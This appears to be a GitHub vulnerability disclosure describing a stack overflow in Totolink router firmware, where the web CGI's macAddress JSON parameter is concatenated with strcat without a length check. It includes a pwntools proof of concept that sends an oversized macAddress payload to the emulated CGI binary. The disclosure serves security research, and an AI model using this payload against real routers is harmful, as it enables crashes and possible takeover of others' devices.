Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
IoT-vuln/Totolink/1.setWiFiAclAddConfig/
IoT-vuln/Totolink/1.setWiFiAclAddConfig/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
img
 
 
 
 

Overview

Affected version

V4.3.0cu.7647_B20210106

Vulnerability details

The vulnerability exists in the router's WEB component. /web_cste/cgi-bin/cstecgi.cgi FUN_0041b448 (at address 0x41b448) gets the json parameter macAddress but doesn't check it's length, a stack overflow occurs by calling strcat function directly to concatenate it into a local variables on the stack:

1.png

As can be seen from the image above, after the parameter macAddress is obtained, it is segmented with ":" and the segmented string is spliced into the local variable local_3c.

POC

from pwn import *
import json

data = {
    "topicurl": "setting/setWiFiAclAddConfig",
    "wifiIdx": "0",
    "addEffect": "0",
    "comment": "AAA",
    "macAddress": "A"*0x200 + ":" + "A"*0x100 + ":A:A"
}
data = json.dumps(data)
print(data)

argv = [
    "qemu-mips-static",
    "-L", "./lib",
    "-E", "LD_PRELOAD=./hook.so",
    "-E", "CONTENT_LENGTH={}".format(len(data)),
    "-E", "REMOTE_ADDR=192.168.2.1",
    "./cstecginew.cgi"
]

a = process(argv=argv)

a.sendline(data.encode())

a.interactive()